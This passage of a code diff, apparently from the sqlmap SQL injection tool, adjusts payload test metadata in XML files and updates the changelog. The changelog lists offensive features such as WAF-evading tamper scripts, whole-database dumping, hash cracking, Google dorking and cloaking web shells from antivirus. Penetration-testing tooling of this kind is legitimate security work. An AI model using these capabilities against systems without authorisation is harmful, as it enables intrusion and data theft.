+        </response>
+        <details>
+            <dbms>Informix</dbms>
+        </details>
+    </test>
     <!-- End of time-based boolean tests - Parameter replace -->
 
     <!-- Time-based boolean tests - ORDER BY, GROUP BY clause -->
@@ -1762,7 +1994,7 @@
     </test>
 
     <test>
-        <title>MySQL &lt;= 5.0.11 time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>
+        <title>MySQL &lt; 5.0.12 time-based blind - ORDER BY, GROUP BY clause (BENCHMARK)</title>
         <stype>5</stype>
         <level>4</level>
         <risk>2</risk>
@@ -1777,7 +2009,7 @@
         </response>
         <details>
             <dbms>MySQL</dbms>
-            <dbms_version>&lt;= 5.0.11</dbms_version>
+            <dbms_version>&lt; 5.0.12</dbms_version>
         </details>
     </test>
 
@@ -1837,7 +2069,6 @@
         <details>
             <dbms>Microsoft SQL Server</dbms>
             <dbms>Sybase</dbms>
-            <os>Windows</os>
         </details>
     </test>
 
@@ -1938,6 +2169,6 @@
             <dbms_version>&gt; 2.0</dbms_version>
         </details>
     </test>
-    <!-- TODO: if possible, add payload for Microsoft Access -->
+
     <!-- End of time-based boolean tests - ORDER BY, GROUP BY clause -->
 </root>

data/xml/payloads/union_query.xml

@@ -346,7 +346,7 @@
     <test>
         <title>MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
         <stype>6</stype>
-        <level>1</level>
+        <level>2</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
         <where>1</where>
@@ -368,7 +368,7 @@
     <test>
         <title>MySQL UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>
         <stype>6</stype>
-        <level>1</level>
+        <level>2</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
         <where>1</where>
@@ -412,7 +412,7 @@
     <test>
         <title>MySQL UNION query ([CHAR]) - 1 to 10 columns</title>
         <stype>6</stype>
-        <level>1</level>
+        <level>2</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
         <where>1</where>
@@ -434,7 +434,7 @@
     <test>
         <title>MySQL UNION query (NULL) - 1 to 10 columns</title>
         <stype>6</stype>
-        <level>1</level>
+        <level>2</level>
         <risk>1</risk>
         <clause>1,2,3,4,5</clause>
         <where>1</where>

doc/CHANGELOG.md

@@ -1,9 +1,44 @@
+# Version 1.7 (2022-01-02)
+
+* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.6...1.7)
+* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/8?closed=1)
+
+# Version 1.6 (2022-01-03)
+
+* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.5...1.6)
+* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/7?closed=1)
+
+# Version 1.5 (2021-01-03)
+
+* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.4...1.5)
+* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/6?closed=1)
+
+# Version 1.4 (2020-01-01)
+
+* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.3...1.4)
+* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/5?closed=1)
+
+# Version 1.3 (2019-01-05)
+
+* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.2...1.3)
+* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/4?closed=1)
+
+# Version 1.2 (2018-01-08)
+
+* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.1...1.2)
+* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/3?closed=1)
+
+# Version 1.1 (2017-04-07)
+
+* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.0...1.1)
+* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/2?closed=1)
+
 # Version 1.0 (2016-02-27)
 
 * Implemented support for automatic decoding of page content through detected charset.
 * Implemented mechanism for proper data dumping on DBMSes not supporting `LIMIT/OFFSET` like mechanism(s) (e.g. Microsoft SQL Server, Sybase, etc.).
 * Major improvements to program stabilization based on user reports.
-* Added new tampering scripts avoiding popular WAF/IPS/IDS mechanisms.
+* Added new tampering scripts avoiding popular WAF/IPS mechanisms.
 * Fixed major bug with DNS leaking in Tor mode.
 * Added wordlist compilation made of the most popular cracking dictionaries.
 * Implemented multi-processor hash cracking routine(s).
@@ -23,7 +58,7 @@
 * Added option `--csv-del` for manually setting delimiting character used in CSV output.
 * Added switch `--hex` for using DBMS hex conversion function(s) for data retrieval.
 * Added switch `--smart` for conducting through tests only in case of positive heuristic(s).
-* Added switch `--check-waf` for checking of existence of WAF/IPS/IDS protection.
+* Added switch `--check-waf` for checking of existence of WAF/IPS protection.
 * Added switch `--schema` to enumerate DBMS schema: shows all columns of all databases' tables.
 * Added switch `--count` to count the number of entries for a specific table or all database(s) tables.
 * Major improvements to switches `--tables` and `--columns`.
@@ -55,7 +90,7 @@
 * Added option `--host` to set the HTTP Host header value.
 * Added switch `--hostname` to turn on retrieval of DBMS server hostname.
 * Added switch `--hpp` to turn on the usage of HTTP parameter pollution WAF bypass method.
-* Added switch `--identify-waf` for turning on the thorough testing of WAF/IPS/IDS protection.
+* Added switch `--identify-waf` for turning on the thorough testing of WAF/IPS protection.
 * Added switch `--ignore-401` to ignore HTTP Error Code 401 (Unauthorized).
 * Added switch `--invalid-bignum` for usage of big numbers while invalidating values.
 * Added switch `--invalid-logical` for usage of logical operations while invalidating values.
@@ -76,14 +111,14 @@
 * Added option `--safe-post` to set POST data for sending to safe URL.
 * Added option `--safe-req` for loading HTTP request from a file that will be used during sending to safe URL.
 * Added option `--skip` to skip testing of given parameter(s).
-* Added switch `--skip-static` to skip testing parameters that not appear dynamic.
+* Added switch `--skip-static` to skip testing parameters that not appear to be dynamic.
 * Added switch `--skip-urlencode` to skip URL encoding of payload data.
-* Added switch `--skip-waf` to skip heuristic detection of WAF/IPS/IDS protection.
+* Added switch `--skip-waf` to skip heuristic detection of WAF/IPS protection.
 * Added switch `--smart` to conduct thorough tests only if positive heuristic(s).
 * Added option `--sql-file` for setting file(s) holding SQL statements to be executed (in case of stacked SQLi).
 * Added switch `--sqlmap-shell` to turn on interactive sqlmap shell prompt.
 * Added option `--test-filter` for test filtration by payloads and/or titles (e.g. `ROW`).
-* Added option `--test-skip` for skiping tests by payloads and/or titles (e.g. `BENCHMARK`).
+* Added option `--test-skip` for skipping tests by payloads and/or titles (e.g. `BENCHMARK`).
 * Added switch `--titles` to turn on comparison of pages based only on their titles.
 * Added option `--tor-port` to explicitly set Tor proxy port.
 * Added option `--tor-type` to set Tor proxy type (`HTTP` (default), `SOCKS4` or `SOCKS5`).
@@ -149,9 +184,9 @@
 * Major bugs fixed.
 * Cleanup of UDF source code repository, https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/udfhack.
 * Major code cleanup.
-* Added simple file encryption/compression utility, extra/cloak/cloak.py, used by sqlmap to decrypt on the fly Churrasco, UPX executable and web shells consequently reducing drastically the number of anti-virus softwares that mistakenly mark sqlmap as a malware.
+* Added simple file encryption/compression utility, extra/cloak/cloak.py, used by sqlmap to decrypt on the fly Churrasco, UPX executable and web shells consequently reducing drastically the number of anti-virus software that mistakenly mark sqlmap as a malware.
 * Updated user's manual.
-* Created several demo videos, hosted on YouTube (http://www.youtube.com/user/inquisb) and linked from http://sqlmap.org/demo.html.
+* Created several demo videos, hosted on YouTube (http://www.youtube.com/user/inquisb) and linked from https://sqlmap.org/demo.html.
 
 # Version 0.8 release candidate (2009-09-21)
 
@@ -302,7 +337,7 @@
 * Added support to extract database users password hash on Microsoft SQL Server;
 * Added a fuzzer function with the aim to parse HTML page looking for standard database error messages consequently improving database fingerprinting;
 * Added support for SQL injection on HTTP Cookie and User-Agent headers;
-* Reviewed HTTP request library (lib/request.py) to support the extended inband SQL injection functionality. Splitted getValue() into getInband() and getBlind();
+* Reviewed HTTP request library (lib/request.py) to support the extended inband SQL injection functionality. Split getValue() into getInband() and getBlind();
 * Major enhancements in common library and added checkForBrackets() method to check if the bracket(s) are needed to perform a UNION query SQL injection attack;
 * Implemented `--dump-all` functionality to dump entire DBMS data from all databases tables;
 * Added support to exclude DBMS system databases' when enumeration tables and dumping their entries (`--exclude-sysdbs`);
@@ -323,7 +358,7 @@
 * Added Microsoft SQL Server extensive DBMS fingerprint checks based upon accurate '@@version' parsing matching on an XML file to get also the exact patching level of the DBMS;
 * Added support for query ETA (Estimated Time of Arrival) real time calculation (`--eta`);
 * Added support to extract database management system users password hash on MySQL and PostgreSQL (`--passwords`);
-* Added docstrings to all functions, classes and methods, consequently released the sqlmap development documentation <http://sqlmap.org/dev/>;
+* Added docstrings to all functions, classes and methods, consequently released the sqlmap development documentation <https://sqlmap.org/dev/>;
 * Implemented Google dorking feature (`-g`) to take advantage of Google results affected by SQL injection to perform other command line argument on their DBMS;
 * Improved logging functionality: passed from banal 'print' to Python native logging library;
 * Added support for more than one parameter in `-p` command line option;
@@ -335,7 +370,7 @@
 * Added inband SQL injection (UNION query) support (`--union-use`);
 * Complete code refactoring, a lot of minor and some major fixes in libraries, many minor improvements;
 * Reviewed the directory tree structure;
-* Splitted lib/common.py: inband injection functionalities now are moved to lib/union.py;
+* Split lib/common.py: inband injection functionalities now are moved to lib/union.py;
 * Updated documentation files.
 
 # Version 0.3 (2007-01-20)